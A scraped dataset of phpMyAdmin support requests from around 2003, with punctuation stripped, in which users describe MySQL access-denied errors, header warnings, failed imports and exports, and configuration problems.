Error MySQL said 1045 Access denied for user root localhost Using password YES) config.inc.php set up as follows i ; cfg[ Servers ][ i][ host ] = localhost ; MySQL hostname or IP address cfg[ Servers ][ i][ port ] = ; MySQL port leave blank for default port cfg[ Servers ][ i][ socket ] = ; Path to the socket leave blank for default socket cfg[ Servers ][ i][ connect type ] = tcp ; How to connect to MySQL server tcp or socket ) cfg[ Servers ][ i][ compress ] = FALSE; Use compressed protocol for the MySQL connection requires PHP amp;gt;= 4.3.0) cfg[ Servers ][ i][ controluser ] = ; MySQL control user settings this user must have read only cfg[ Servers ][ i][ controlpass ] = ; access to the amp;quot;mysql user amp;quot; and amp;quot;mysql db amp;quot; tables) cfg[ Servers ][ i][ auth type ] = config ; Authentication method config, http or cookie based)?
cfg[ Servers ][ i][ user ] = root ; MySQL user cfg[ Servers ][ i][ password ] = password ; MySQL password only needed with config auth type) The above code appears in 3 locations.
I think their is a conflict between this and MySQL.
Any Ideas.
I am new to PHP MySQL!!
Original URL https sourceforge.net p phpmyadmin support requests 355 https sourceforge.net p phpmyadmin support requests 355 Original author scousers Found in version 2.5.4","bug"
"24444","2172","No data output when browsing a table.
Hi, we recently upgraded to PHP 4.3.3 and the table amp;quot;Browse amp;quot; feature does not output data.
Everything else works fine.
Redhat Ent v2 Apache v1.3.27 MySQL v4.0.15 PHP v4.3.3 Thank You.
Original URL https sourceforge.net p phpmyadmin support requests 356 https sourceforge.net p phpmyadmin support requests 356 Original author bnewsome Found in version 2.5.4","bug"
"24444","2173","phpMyAdmin 2.2.6 error 10050.
Quand j essaye de me connecter a PhpMyAdmin, j obtiens le message decrit ci dessous.
Debut Message Bienvenue xc5x95 phpMyAdmin 2.2.6 Warning Cannot add header information headers already sent by output started at c \program files\easyphp\phpmyadmin\libraries\auth\config.auth.lib.p hp 91) in c \program files\easyphp\phpmyadmin\header.inc.php on line 23 Warning Cannot add header information headers already sent by output started at c \program files\easyphp\phpmyadmin\libraries\auth\config.auth.lib.p hp 91) in c \program files\easyphp\phpmyadmin\header.inc.php on line 24 Warning Cannot add header information headers already sent by output started at c \program files\easyphp\phpmyadmin\libraries\auth\config.auth.lib.p hp 91) in c \program files\easyphp\phpmyadmin\header.inc.php on line 25 Warning Cannot add header information headers already sent by output started at c \program files\easyphp\phpmyadmin\libraries\auth\config.auth.lib.p hp 91) in c \program files\easyphp\phpmyadmin\header.inc.php on line 26 Warning Cannot add header information headers already sent by output started at c \program files\easyphp\phpmyadmin\libraries\auth\config.auth.lib.p hp 91) in c \program files\easyphp\phpmyadmin\header.inc.php on line 27 Warning Cannot add header information headers already sent by output started at c \program files\easyphp\phpmyadmin\libraries\auth\config.auth.lib.p hp 91) in c \program files\easyphp\phpmyadmin\header.inc.php on line 29 Erreur MySQL a rxc3xa9pondu Can t connect to MySQL server on localhost 10050) Fin Message Pouvez vous me dire ou est le probleme ?
Merci d avance.
Gerard Paquet mail gpaquet info.fundp.ac.be) Institut d Informatique Facultes Universitaires Notre Dame de la Paix Namur Belgique) Original URL https sourceforge.net p phpmyadmin support requests 357 https sourceforge.net p phpmyadmin support requests 357 Original author anonymous","bug"
"24444","2174","W2k, mysql, IIS6, php and phpmyadmin.
I curently have a W2K server running IIS6 with the latest mysql and php and phpmyadmin installed.
I am trying to use phpmyadmin and I am having difficulty connecting to the W2K server s mysql with the correct permissions.
I have the phpmyadmin config file setup to connect to two other servers running mysql, one on Madrake 9.1 and the other running an old E Smith version.
When I connect with phpmyadmin, I have all the correct permissions on the linux boxes but no matter what user I log in with through phpmyadmin I can only see the amp;quot;test amp;quot; db on mysql and do not have permissions to create any databases.
I am using HTTP authentication for phpmyadmin and have played around with several users trying to get the correct permissions, including Administrator and root, both these users have full permissions on mysql.
I did find one post somewhere that suggested installing the 3.51 ODBC drivers.
That didn t work, any suggestions?
Thanks in advance.
Sal Original URL https sourceforge.net p phpmyadmin support requests 358 https sourceforge.net p phpmyadmin support requests 358 Original author salscozzari Found in version 2.5.4","bug"
"24444","2175","Cant install software, error message keeps coming up.
I m trying to install phpmyadmin to sort out a bug on my site, however after entering all the information and going to the phpmyadmin page for my site I keep getting the below error Error MySQL said 1045 Access denied for user root localhost Using password NO) No matter what I do, or where I put my details this error comes up.
Could someone please help me with this.
Thanks in advance Original URL https sourceforge.net p phpmyadmin support requests 359 https sourceforge.net p phpmyadmin support requests 359 Original author trae","bug"
"24444","2176","Why use phpMyAdmin ALWAYS the file owner to connect to db?.
Hi, i have two server installations.
Both have phpMyAdmin which are configured to http authenticate mode.
All used user are define in the mysql s) and are working.
The first system phpMyAdmin 2.5.2; PHP 4.1.0; mysql 3.23.48; apache 1.3.23; linux 2.4.18) works very well.
The second newer) system phpMyAdmin 2.5.2; PHP 4.3.1; mysql 3.23.55; apache 2.0.46; linux 2.4.20) works also with a working mysql connection).
And this is the problem.
It makes no difference with invented) user and password combination i enter in the http authentification popup.
PhpMyAdmin uses alway wwwrun for the user and no password.
If i change the user in the filesystem like chown R example srv www phpmyadmin) the next connection use the user example with no password.
Why?
Have i a configuration problem, or just a bug?
Thanks.
Original URL https sourceforge.net p phpmyadmin support requests 360 https sourceforge.net p phpmyadmin support requests 360 Original author anonymous Found in version 2.5.2","bug"
"24444","2177","GRANT problem.
When I issue the command GRANT SELECT , INSERT , UPDATE , DELETE ON sassisc.
TO sassisc localhost IDENTIFIED BY plymuth3 it comes back with Error SQL query GRANT SELECT , INSERT , UPDATE , DELETE ON sassisc.
TO sassisc localhostIDENTIFIEDBY dodge3 MySQL said You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near BY plymuth3 at line 1 It seems it gets rid of the space between localhost and IDENTIFIED BY .
I tired sassisc localhost but did not help.
If I get rid of the IDENTIFIED BY dodge3 it works fine.
Thanks.
mohsenkashani hotmail.com Original URL https sourceforge.net p phpmyadmin support requests 361 https sourceforge.net p phpmyadmin support requests 361 Original author anonymous","bug"
"24444","2178","reset password for phpMyAdmin MySQL.
Thank you for the support board, and I am a new user here.
New also to phpMyAdmin MySQL also.
I have seached both amp;quot; reset password amp;quot; standard and both to no avail.
I have been around since amp;quot;paper tape amp;quot; , Commodore 8032 then, DOS 2.0 so I should understand a vast majority here.. ) I am also versed somewhat in C C , VB and a few others and am looking forward to contributing.
I am presently leasing server space and installed is MySQL 4.0.15 standard running on localhost with phpMyAdmin 2.5.2 I had forgotten my password for the admin account and contacted them...and their response is as follows amp;quot; You will have to delete the guestbook and reinstall if you can t find it.
amp;quot; I know this statement != , so I am requesting some help please....Also I will be needing to set up a amp;quot;page amp;quot; for amp;quot;forgot reset amp;quot; password for my users.
Thank you in advance.
Jim Original URL https sourceforge.net p phpmyadmin support requests 362 https sourceforge.net p phpmyadmin support requests 362 Original author trochia Found in version 2.5.2","bug"
"24444","2179","Warning Cannot modify header information.
Trying to install.... PHP and MySQL seem to be installed right on a w2k server, yet when I pull up the page I recieve the following message.... Any thoughts?
Warning Cannot modify header information headers already sent by output started at C \Inetpub\wwwroot\phpMyAdmin 2.5.4 \config.inc.php 1) in C \Inetpub\wwwroot\phpMyAdmin 2.5.4\index.php on line 45 Original URL https sourceforge.net p phpmyadmin support requests 363 https sourceforge.net p phpmyadmin support requests 363 Original author enaille","bug"
"24444","2180","Error when renaming a table.
from http sourceforge.net tracker ?
group id=23067 amp;amp;atid=377408 I try to rename a table with a dot .)
in its name.
I know that mysql doesn t support this, but phpMyAdmin shows amp;lt;b amp;gt;Warning Cannot modify header information headers already sent by output started at var www adm php admin libraries header meta style .inc.php 21) in var www adm php admin libraries db table exists.lib.
php on line 30 amp;lt; b amp;gt; instead of any message.
I use Debian unstable, php4 and Apache.
Original URL https sourceforge.net p phpmyadmin support requests 364 https sourceforge.net p phpmyadmin support requests 364 Original author frixuelin","bug"
"24444","2181","Permissions Problems.
Hello, I m having trouble with Global users permissions and creating new users.
I might create a new user and assisgn him her permissions but then i cant login to phpMyAdmin as that new user.
Or if in some rare cases it does let me login the user shows up with no permissions to see any databases or tables.
But the Secure phpMyAdmin login doesn t seems to be working hardly at all.
Can you help me with this or can you point me to some online documentation to resolve this.
I m farely familiar with DBA work i m trained in Oracle 9i.
So as a summery i set Global permissions only no individual databse permissions were set.
Thanks Brian Original URL https sourceforge.net p phpmyadmin support requests 365 https sourceforge.net p phpmyadmin support requests 365 Original author anonymous","bug"
"24444","2182","Undefined variables on pages while running SQL script.
Hello, I m new to phpMyAdmin and have inherted a site that was created 1 year ago.
Following the instructions from the previous programmer, I am trying to run a SQL script that creates and propagates a table.
However, I am receiving a notice and warning on 3 pages.
Notice Undefined variable db in usr loacl admin cgi pub phpMyAdmin read dump.php on line 240 Warning Cannot modify header information headers already sent by output started at usr local admin cgi pub phpMyAdmin read dump.php 240) in usr local admin cgi pub phpMyAdmin main.php on line 25 Warning Cannot modify header information headers already sent by output started at usr local admin cgi pub phpMyAdmin read dump.php 240) in usr local admin cgi pub phpMyAdmin header.inc.php on line 27, 28, 29, 30, 32 Warning Cannot modify header information headers already sent by output started at usr local admin cgi pub phpMyAdmin read dump.php 240) in usr local admin cgi pub phpMyAdmin libraries ob.lib.php on line 65 Please help!
Thanks in advance.
ersiegfried earthlink.net Original URL https sourceforge.net p phpmyadmin support requests 366 https sourceforge.net p phpmyadmin support requests 366 Original author anonymous Found in version 2.4.0","bug"
"24444","2183","output buffering set in PHP.ini.
When I set the output buffering 4096 in php.ini, phpMyAdmin will have a strange behavior that I can t get table structure, but still can browse the table.
But when I set the output buffering off in php.ini, everything works fine.
Original URL https sourceforge.net p phpmyadmin support requests 367 https sourceforge.net p phpmyadmin support requests 367 Original author anonymous Found in version 2.5.4","bug"
"24444","2184","JavaScript Runtime Error On Every Page.
I was using PHPMyAdmin v2.5.3, and every page that I went to, I got an Access Denied runtime error.
I upgraded to PHPMyAdmin v2.5.4, hoping that would solve the problem, but it hasn t. If I debug, it says that the error is occuring on the following line if parent.frames.queryframe amp;amp; amp;amp; parent.frames.queryframe.document amp;amp; amp;amp; parent.frames.queryframe.document.queryframeform) \{ As I said, this happens on every page, and it s getting very annoying.
Thanks!
Brian.
Original URL https sourceforge.net p phpmyadmin support requests 368 https sourceforge.net p phpmyadmin support requests 368 Original author toot4fun Found in version 2.5.4","bug"
"24444","2185","error tbl row delete.php Missing sql query.
Hi When using phpMyAdmin to edit records in one of our tables I recieve this error tbl row delete.php Missing sql query Any ideas how this can be fixed?
Thanks in advance for your assistance DonCarlo e mail address strike team hotmail.com Original URL https sourceforge.net p phpmyadmin support requests 369 https sourceforge.net p phpmyadmin support requests 369 Original author anonymous","bug"
"24444","2186","Importing CSV file.. Hello, In previous versions of phpAdmin I was able to import data from a comma separated text file into a table.
My web hosting provider has informed me that this has been disabled in the newer version of phpAdmin.
I would like to know two things please 1\.
Was this disabled by my web hosting company during configuration of phpadmin, or was it disabled totally in the latest distribution of phpadmin?
2\.
What kind of security issues would this cause if it was available?
What is the danger in having this option?
I found it quite usefull.
thanks for answering my two questions.
Marcel Original URL https sourceforge.net p phpmyadmin support requests 370 https sourceforge.net p phpmyadmin support requests 370 Original author mgelinas Found in version Latest Git","bug"
"24444","2187","duplicates part of sql text sql fails w 1060 error.
Using the phpMyAdmin amp;quot;modify table amp;quot; button, trying to add a new field, see the sql generated below I always get part of the sql command duplicated, so the command fails.
ALTER TABLE `pp Requests` ADD `test` VARCHAR 10 ) NOT NULL , ADD `test` VARCHAR 10 ) NOT NULL MySQL said 1060 Duplicate column name test The same thing happens when trying to change a fields properties, even as simple as a varchar field length.
SQL query ALTER TABLE `pp Requests` CHANGE `firstname` `firstname` VARCHAR 40 ) DEFAULT NULL , CHANGE `firstname` `firstname` VARCHAR 40 ) DEFAULT NULL MySQL said 1054 Unknown column firstname in pp Requests I m running version 2.5.4, and vsn 3.23.54 of mySql.
PHP vsn 4.2.2 Redhat 9.0 Your help is much appreciated!
mkennedy zoomtown.com Maeve Kennedy Original URL https sourceforge.net p phpmyadmin support requests 371 https sourceforge.net p phpmyadmin support requests 371 Original author anonymous Found in version 2.5.4","bug"
"24444","2188","Headache uploading .sql file.
Hi, I have a dumped .sql file, and I want to run it upload into my database on another server.
I ve got to the stage where I ve set the Upload directory in the config file, and my .sql file now appears in the drop down menu in the SQL tab.
But after clicking Go I still keep getting Internal Server Errors 500).
What is going wrong??
Thanks Graham g2 blueyonder.co.uk Original URL https sourceforge.net p phpmyadmin support requests 372 https sourceforge.net p phpmyadmin support requests 372 Original author anonymous","bug"
"24444","2189","query queries on database restore.
DSSTVLIVE.COM hosted site Database Issue Run SQL query queries on database dsstvlive com forum Browse and upload the backup date file Structure and data dsstvlive.sql the browser shows progress to 100 then there is a delay and this messages No SQL query!
6.5] How can I restore upload) my database or table using a dump?
How can I run a amp;quot;.sql amp;quot; file.
Click on a database name in the left frame, the properties will be local displayed.
Then in the amp;quot;Run SQL query amp;quot; section, type in your dump filename, or use the Browse button.
Then click Go.
Results = No SQL query!
If I just upload a backup of there structure only = Structure only dsstvlive.sql Your SQL query has been executed successfully The content of your file has been inserted.
92 Instructions) If after the SQL query for the structure only I try to do a date upload = data only dsstvlive.sql I get the same error or message as uploading the data structure.sql file Results = No SQL query!
End results are that the tables structure is created but we can t upload the data ========================================== ====================================== What are the settings at the server level that has to be reset on this account to solve this issue.
Original URL https sourceforge.net p phpmyadmin support requests 373 https sourceforge.net p phpmyadmin support requests 373 Original author ontherun","bug"
"24444","2190","Cant Export.
i have phpMyAdmin 2.4.0 installed on my site and the problem is when i try to export the database first, browser seems to be opening the page for few minutes and then i get the error amp;quot; page can not be displayed amp;quot;and i cant save my database but if i try to export table by table it works but there is this one table that is about 4 or 5 MB and i cant export it or save it any ideas ?
Original URL https sourceforge.net p phpmyadmin support requests 374 https sourceforge.net p phpmyadmin support requests 374 Original author anonymous Found in version 2.4.0","bug"
"24444","2191","Remote file upload.
I m just downloaded and installed the 2.5.4 stable release and it seems that the file upload facility has been changed into a rather painful feature to use in certain circumstances.
I was running 2.5.0 before that and I was able to upload any sql file from any location on my computer to the phpmyadmin box which is actually the same computer).
While I do like the addition of the upload directory in that I can see all the sql files in that directory, I have the problem where I like to store my dumps in a particular location, upload them from somewhere else, and work on them in a 3rd location.
For example, we have 2 developers working on the project, we each create sql scripts and put them into cvs.
While I can just set the upload directory to the cvs dir, I also take backups of my system and put them in a different spot so that they are not confused with my cvs files.
At times I want to restore these files, which means I have to copy them into the other directory in order for the interface to see them.
As I said before, I like the new feature, but do not think that it should have been implemented at the expense of the flexible upload file feature.
Is it possible to run both features and let the user choose to upload from the server or from their local filesystem?
Original URL https sourceforge.net p phpmyadmin support requests 375 https sourceforge.net p phpmyadmin support requests 375 Original author mrsmiley18","enhancement"
"24444","2192","Undefined index in export.php line 194. phpMyAdmin 2.5.4 While exporting a db, I get this Notice Undefined index scheme in [] export.php on line 194 Warning Cannot modify header information headers already sent by output started at [] export.php 194) in [] export.php on line 194 and others headers already sent...
Original URL https sourceforge.net p phpmyadmin support requests 376 https sourceforge.net p phpmyadmin support requests 376 Original author anonymous","bug"
"24444","2193","change max allowed packet size.
I get the following error when browsing a table with longblob type columns.
Error SQL query SELECT FROM `scaffold` LIMIT 0 , 30 MySQL said 2020 Got packet bigger than max allowed packet I know I need to increase max allowed packet, but I can t figure out just how to do this.
I have the following entries in the my.cnf file.. [mysql] auto rehash set variable = max allowed packet=64M The MySQL server [mysqld] basedir= opt mysql datadir= opt mysql var skip locking port = 3306 socket = tmp mysql.sock server id = 1 tmpdir = opt data tmp log log bin user=mysql set variable = join buffer size=2048M set variable = key buffer size=6144M set variable = max allowed packet=64M set variable = max connections=512 set variable = bulk insert buffer size=64M set variable = myisam sort buffer size=2048M set variable = myisam max extra sort file size=512 set variable = myisam max sort file size=6144M set variable = read buffer size=512M set variable = read rnd buffer size=512M set variable = sort buffer size=2048M set variable = table cache=512 set variable = thread cache size=32 set variable = thread concurrency=32 set variable = tmp table size=4096M The settings let me connect to the database with a standard mysql client and retrieve my data.
However, the phpMyAdmin install on that same machine does not seem to be picking up the setting... Keep in mind that this setting needs to be picked up by both the client and the server.
From my testing... using the show variables like max allowed packet always shows the server setting not the client setting.
So, don t be fooled into thinking it is correct until you try and select a large field.
My items are actuall about 1.7MB in size Original URL https sourceforge.net p phpmyadmin support requests 377 https sourceforge.net p phpmyadmin support requests 377 Original author jeffwrule Found in version 2.5.3","bug"
"24444","2194","Steps to Restoring a Database.
What are the basic steps I can take to restore a MySQL database from the backup file tbl dump)?
Please send your answer to jmackenzie mackenziesonline.com.
Thank you!
Original URL https sourceforge.net p phpmyadmin support requests 378 https sourceforge.net p phpmyadmin support requests 378 Original author anonymous Found in version 2.5.0","bug"
"24444","2195","No Privileges.
I have installed phpMyAdmin succesfully and the application that utilzes my swl db is working great.
However, i want to create another Db for another appication.
I see the following Create new database No Privileges And create new database is disabled.
Am I missing something here.
Do I need to be logged in somewhere?
Original URL https sourceforge.net p phpmyadmin support requests 379 https sourceforge.net p phpmyadmin support requests 379 Original author anonymous","bug"
"24444","2196","primary key encoding breaks edit view PHP3).
This is for version 2.5.4 downloaded on 2003 12 04.
This version had been marked as latest stable release on the phpMyAdmin webpage.
Here is the problem I have a table with a primary key of type INT.
When I search for records in this table and then click the pencil to modify one of the resulting records I get this error SELECT FROM `report` WHERE `db id` = \ 56\ MySQL said 1064 You have an error in your SQL syntax near \ 56 \ at line 1 Obviously, the quotes around the number 56 should not be escaped with backslashes.
The link behind the pencil contains the primary key as primary key= 60db id 60 3D 2756 27 I guess there is something going wrong with the unencoding of the URL parameters on the way back into the php script... MARK Original URL https sourceforge.net p phpmyadmin support requests 380 https sourceforge.net p phpmyadmin support requests 380 Original author markarnold","bug"
"24444","2197","Restore database from dump .
if you using auto increment, it s impossible to restore database from dump.
BEGIN DUMP CREATE TABLE `sp tovar vid` `id` int 11) NOT NULL auto increment, `id tovar vid` int 11) NOT NULL default 0 , `name` varchar 100) NOT NULL default , `description` varchar 255) NOT NULL default , UNIQUE KEY `id` `id`) ); INSERT INTO `sp tovar vid` VALUES 0, 0, root , root category ); INSERT INTO `sp tovar vid` VALUES 7, 0, cat.1 , ); END DUMP new id s will 1 and 2.
Original URL https sourceforge.net p phpmyadmin support requests 381 https sourceforge.net p phpmyadmin support requests 381 Original author zinit Found in version 2.5.4","bug"
"24444","2198","404 error.
When trying to run a SQl query, I keep getting a 404 error message.
I have followed the steps on the tutorial and have no idea why this is happening.
this is the first time i have used this.
thanks.
Original URL https sourceforge.net p phpmyadmin support requests 382 https sourceforge.net p phpmyadmin support requests 382 Original author anonymous Found in version 2.5.4","bug"
"24444","2199","undo database changes...?.
I m a donut!
I thought I d backed up my database but had only copied the directory structure instead.
Now I ve tried to install a mod and am getting fatal errors on the forum.
Reloading the saved directory structure doesn t make any difference.
Is there anyway I can undo the database changes I made to get my forum back to it s original status?
Thanks, FP.
Original URL https sourceforge.net p phpmyadmin support requests 383 https sourceforge.net p phpmyadmin support requests 383 Original author foul play Found in version 2.5.4","bug"
"24444","2200","Unknown column `col1`.
MySQL 4.1.0 alpha max nt phpMyAdmin 2.5.4 BEGIN DUMP CREATE TABLE `sp tovar vid` `id` int 11) NOT NULL auto increment, `id tovar vid` int 11) NOT NULL default 0 , `name` varchar 100) NOT NULL default , `description` varchar 255) NOT NULL default , UNIQUE KEY `id` `id`) ) TYPE=InnoDB CHARSET=cp1251; INSERT INTO `sp tovar vid` VALUES 1, 0, string 1 , ); INSERT INTO `sp tovar vid` VALUES 2, 1, string 2 , ); INSERT INTO `sp tovar vid` VALUES 3, 2, string 3 , ); INSERT INTO `sp tovar vid` VALUES 4, 0, string 4 , ); INSERT INTO `sp tovar vid` `id`,`id tovar vid`,`name`,`description`) VALUES , 0 , , ); UPDATE `sp tovar vid` SET `id` = 0 WHERE `id` = LAST INSERT ID ) LIMIT 1 ; END DUMP BEGIN QUERY SELECT t1.`id`, CONCAT if t3.`name`= , ,CONCAT t3.`name`, amp;gt; )),if t2.`name`= , ,CONCAT t2.`name`, amp;gt; )),t1.`name`) AS col1, t1.`description` FROM `sp tovar vid` AS t1, `sp tovar vid` AS t2, `sp tovar vid` AS t3 WHERE t1.`id tovar vid`=t2.`id` AND t2.`id tovar vid`=t3.`id` AND col1 amp;gt; string ORDER BY col1; END QUERY QUESTION why ERROR caused 1054 Unknown column col1 in where clause result wanted \ | id | col1 | description | \ | 1 | string 1 | | | 2 | string 1 amp;gt; string 2 | | | 3 | string 1 amp;gt; string 2 amp;gt; string 3 | | | 4 | string 4 | | \ 4 rows in set 0.00 sec) Original URL https sourceforge.net p phpmyadmin support requests 384 https sourceforge.net p phpmyadmin support requests 384 Original author zinit Found in version 2.5.4","bug"
"24444","2201","cfg[ Servers ][ i][ column info ].
When I am in a database, i get the follow fault Error The additional Features for working with linked Tables have been deactivated.
To find out why click here.
and when I click on amp;quot;here amp;quot;, i get the follow page cfg[ Servers ][ i][ pmadb ] ... OK cfg[ Servers ][ i][ relation ] ... OK General relation features Enabled cfg[ Servers ][ i][ table info ] ... OK Display Features Enabled cfg[ Servers ][ i][ table coords ] ... OK cfg[ Servers ][ i][ pdf pages ] ... OK Creation of PDFs Enabled cfg[ Servers ][ i][ column info ] ... OK Displaying Column Comments Enabled Bookmarked SQL query Disabled MIME ... OK cfg[ Servers ][ i][ history ] ... OK SQL history Enabled How can i solve the fault amp;quot;Bookmarked SQL query Disabled amp;quot;??
Original URL https sourceforge.net p phpmyadmin support requests 386 https sourceforge.net p phpmyadmin support requests 386 Original author dwlnetnl","bug"
"24444","2202","2.5.5 rc2 times out with larger files.
Hello, I downloaded and installed phpMyAdmin 2.5.5 rc2 today December 16,2003.
ISSUE read dump.lib.php times out with larger files.
The file is only 906 KB.
FATAL ERROR Fatal error Maximum execution time of 30 seconds exceeded in c \program files\apache\htdocs\phpmyadmin255 \libraries\read dump.lib.php on line 77 FILES FAILING Mulitiple attempts at two different files have failed customer table data 2000 records, 906KB download table data 5000 records, 2100 KB You can have the download table data on request.
THANK YOU Thanks for all your hard work, I rely on this application for many of my database data handling needs.
Keep up the good work.
Richard.
phpmyadmin phpyellow.com Let us know if you have a question.
Globalissa Information Services Software Powers the Net tm http www.globalissa.com http phpyellow.com Global I.S.
S.A. EMAIL POLICY It is our policy to respond to your inquiry within 48 hours or 2 business days, not including weekends or holidays.
To contact us visit any Globalissa website and click Contact us .
If your inquiry is not answered by our staff within 48 hours or 2 business days then resend your message.
Original URL https sourceforge.net p phpmyadmin support requests 385 https sourceforge.net p phpmyadmin support requests 385 Original author anonymous","bug"
"24444","2203","mysql problems after install.
I installed phpMyAdmin on a SME e smith) box, after do what inst.txt indicates with mysql GRANT, privileges, etc) I canxc2xb4t run anymore mysql This is the error [root server html] mysql ERROR 1045 Access denied for user root localhost Using password YES) [root server html] Help!!!
Regards Eduardo Rivero Original URL https sourceforge.net p phpmyadmin support requests 388 https sourceforge.net p phpmyadmin support requests 388 Original author niki40","bug"
"24444","2204","converting db from mysql to Access.
I d like to convert my MySql 4.0.16 database It s on somebody else s server) to a Database in Microsoft Access version in Office Xp package).
I want to do this for analysing purposes.
I tried downloading a sql dump and importing that through sql in access, but that doesn t work.
Anybody knows a way to do this?
And while were at it, would it be possible to extract the database from Access and put it back in the MySql database that would make a extra backup function).
thanks, Kroesss kroesss hotmail.com Original URL https sourceforge.net p phpmyadmin support requests 389 https sourceforge.net p phpmyadmin support requests 389 Original author anonymous Found in version 2.5.3","bug"
"24444","2205","Re [ 861281 ] 2.5.5 rc2 times out with larger files.
This item is actually a continuation of [ 861281 ].
I could not find a way to upload a file without creating a new ticket, sorry, I m new to this site and short of time ... so I just created a new ticket ) PURPOSE The table tracks free software downloads for Globalissa.com PHP applications, including productname, date hit, network referer and refering url.
CONFIDENTIAL The attached file is 100 confidential and for internal use of sourceforge only.
If your system displays this attachment file to others then please delete this attachment at once.
Please let me know if you have a question.
Richard Globalissa Information Services Software Powers the Net tm http www.globalissa.com http phpyellow.com Global I.S.
S.A. EMAIL POLICY It is our policy to respond to your inquiry within 48 hours or 2 business days, not including weekends or holidays.
To contact us visit any Globalissa website and click Contact us .
If your inquiry is not answered by our staff within 48 hours or 2 business days then resend your message.
Original URL https sourceforge.net p phpmyadmin support requests 387 https sourceforge.net p phpmyadmin support requests 387 Original author globalissa","bug"
"24444","2206","Enabling Security.
I have someone that is installing a website for me on my webspace... but I had to install phpmyadmin...
I gave them the info but they told me that in the dropdown it keeps calling because it doesnt have security enabled.
Can you tell me how I can make it security enabled?
I have never worked with phpmyadmin before and do not know much about it... any help would be appreciated.
Thanks.
My email address is sandyphillips sandraphillips.com Sandy Original URL https sourceforge.net p phpmyadmin support requests 390 https sourceforge.net p phpmyadmin support requests 390 Original author anonymous","bug"
"24444","2207","Service Choice Drop down.
I have, after some little issues, installed myPHPAdmin and it s found the mySQL database.
However, in the Server Choice drop down box, I have three entries localhost thisismatt thisismatt) localhost thisismatt) localhost thisismatt thisismatt) The first and last options work successfully, enabling me to tweak the database but the second brings an error in the left hand frame as shown below Warning mysql list dbs ) Unable to save MySQL query result in home t h thisismatt public html phpMyAdmin libraries common.lib.php on line 1127 Server localhost Error SQL query SHOW DATABASES ; MySQL said 1045 Access denied for user thisismatt localhost Using password YES) In short.......... 1, Why are there three entries when I have only one database?
2, Why does option two fail?
Thanks in advance.
Matt Original URL https sourceforge.net p phpmyadmin support requests 391 https sourceforge.net p phpmyadmin support requests 391 Original author thisismatt Found in version 2.5.4","bug"
"24444","2208","PHPMyAdmin page unavailable after Denied access to mysql DB.
after getting this message amp;quot; 1045 Access denied for user root localhost Using password NO) amp;quot;, I then set a password for the Username amp;quot;root amp;quot; with Command Editor and tried to use the PHPMyAdmin Database Administration Page to reconnect to the same database but always get the same Deny Message above.
Everytime I fail to access the PHPMyAdmin page, instead I get this annoying message.
Can you provide step by step help to fix this, Thanks amp;amp; Merry X Mas jpvega sloan.mit.edu Original URL https sourceforge.net p phpmyadmin support requests 392 https sourceforge.net p phpmyadmin support requests 392 Original author anonymous Found in version 2.5.3","bug"
"24444","2209","Login Password.
I have installed phpmyadmin on my server, and before on my old server it would ask for a username and password before entering.
This one does not.
It just automaticly opens the utility leaving it wide open with root permissions to anybody.
admin deeplist.com Original URL https sourceforge.net p phpmyadmin support requests 393 https sourceforge.net p phpmyadmin support requests 393 Original author anonymous Found in version 2.5.4","bug"
"24444","2210","Importing large files times out.
Hi, I m using CPanel 6.0 on my current host and PHP version 4.3.3 MySQL version 4.0.15 standard When I import a 170MB backup.sql file, phpMyAdmin ALWAYS times out.
I get a page not found error at the end.
This even happens on my local test machine.
Please let me know what to do so I can pass along the info.
A lot of hosts won t allow shell access for people to back up their databases.
It s VERY frustrating.
This error even happened in MySQL 3.X.
Thanks Andy Knifel Drumsmith.com Original URL https sourceforge.net p phpmyadmin support requests 395 https sourceforge.net p phpmyadmin support requests 395 Original author anonymous","bug"
"24444","2211","sticked in a refresh loop.
i cannot use phpmyadmin.
when i type installed url, it ve been sticked in a loop refresh.
How to solve ?
Original URL https sourceforge.net p phpmyadmin support requests 394 https sourceforge.net p phpmyadmin support requests 394 Original author vantt","bug"
"24444","2212","Problems loading database from schema dump.
I am using phpmyadmin version 2.5.4 I have used the Export facility on a Windows XP machine running Apache to create a file containing the entire schema.
I have created both a compressed and uncompressed version.
I am also running the same version of phpmyadmin on a Windows 2000 machine running IIS.
On this machine I am going to the SQL window and using the or location of the textfile option in order to automatically restore the database using SQL.
Unfortunately I just keep getting a No SQL Query!
error.
The same technique works fine on the Apache machine.
Why is the IIS version not reading the file I specify and running the SQL therein ?
At the moment I am having to cut and paste the contents of the export file into the SQL window to get it to work.
Original URL https sourceforge.net p phpmyadmin support requests 396 https sourceforge.net p phpmyadmin support requests 396 Original author kpturner Found in version 2.5.4","bug"
"24444","2213","authentication protocol.
I upgraded mysql to 4.1 and I get an error message now when accessing phpmyadmin.
Client does not support authentication protocol requested by server; consider upgrading MySQL client .
Without changing my mysql server, is there a way to resolve this issue.
Thanks Original URL https sourceforge.net p phpmyadmin support requests 397 https sourceforge.net p phpmyadmin support requests 397 Original author kgs51 Found in version 2.5.4 rc2","bug"
"24444","2214","Incorrect URLs generated.
I have managed to login ok and my database is listed in the left hand side.
However, when clicking any link, an extra http; is inserted in the URL, hence the link does not work.
If I remove this part manually and refresh, then the function works!!
Example, My DB link is created as http http; www.localartshop.co.uk DBA db details str ucture.php?lang=en iso 8859 1 server=1 db=db93035193 when it should be http www.localartshop.co.uk DBA db details structure.
php?lang=en iso 8859 1 server=1 db=db93035193 This is similar with all other links Home, Query Window, phpMyAdmin Documentation, Databases, Export, etc).
Is this a configuration problem on my part, or with my web host??
Simon.
Original URL https sourceforge.net p phpmyadmin support requests 398 https sourceforge.net p phpmyadmin support requests 398 Original author sbarkeruk","bug"
"24444","2215","Create table doubles up on the fields.
Using latest download build, not from CVS 2.5.5 pl1 When I attempt to create a table, it gives me an error 1060 Duplicate column name employee id If you look at the constructed SQL, the reason is that it is duplicating the field row CREATE TABLE `employee locations` `employee id` INT NOT NULL , `employee id` INT NOT NULL ) Original URL https sourceforge.net p phpmyadmin support requests 399 https sourceforge.net p phpmyadmin support requests 399 Original author jfuhr","bug"
"24444","2216","Click browse loses LHS Database selection.
Select a database, select a table.
Click any tab apart from Browse and the LHS frame does not refresh, correct.
However click Browse tab for that table and the left frame refreses and loses it s selected Database.
Windows XP, Firebird and IE6 Original URL https sourceforge.net p phpmyadmin support requests 400 https sourceforge.net p phpmyadmin support requests 400 Original author mrslim","bug"
"24444","2217","Caught in infinite loop on editing.
i ve just updated to phpmyadmin 2.5.5 pl1 and found out that it is caught in an infinite loop when i click the edit button of a table entry.
the header will load but that s it.
last thing i see is the table comment before i have to kill php.exe manually.
